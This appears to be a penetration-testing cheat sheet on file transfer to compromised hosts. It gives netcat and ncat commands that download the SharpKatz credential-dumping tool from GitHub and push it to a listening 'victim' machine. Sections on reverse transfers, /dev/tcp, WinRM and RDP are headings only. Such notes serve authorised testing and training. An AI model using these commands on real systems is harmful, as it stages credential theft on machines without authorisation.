Misc File Transfers

File Transfer with Netcat and Ncat

Victim will listen

NetCat - Compromised Machine - Listening on Port 8000

victim@target:~$ # Example using Original Netcat
victim@target:~$ nc -l -p 8000 > SharpKatz.exe

Ncat - Compromised Machine - Listening on Port 8000

victim@target:~$ # Example using Ncat
victim@target:~$ ncat -l -p 8000 --recv-only > SharpKatz.exe

Netcat - Attack Host - Sending File to Compromised machine

$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
$ # Example using Original Netcat
$ nc -q 0 192.168.49.128 8000 < SharpKatz.exe

Ncat - Attack Host - Sending File to Compromised machine

$ wget -q https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/SharpKatz.exe
$ # Example using Ncat
$ ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

Attacker will listen

Attack Host - Sending File as Input to Netcat

Compromised Machine Connect to Netcat to Receive the File

Attack Host - Sending File as Input to Ncat

Compromised Machine Connect to Ncat to Receive the File

Compromised Machine Connect to /dev/tcp to Receive the file

File Transfer with PowerShell Remoting (WinRM)

From DC01 - Confirm WinRM port TCP 5985 is Open on DATABASE01.

Create a PowerShell Remoting Session to DATABASE01

Copy samplefile.txt from our Localhost to the DATABASE01 Session

Copy DATABASE.txt from DATABASE01 Session to our Localhost

File Transfer with RDP

Mounting a Linux Folder Using rdesktop

Mounting a Linux Folder Using xfreerdp

Then connect to

  • File Manager \\tsclient\

  • mstsc.exe

Last updated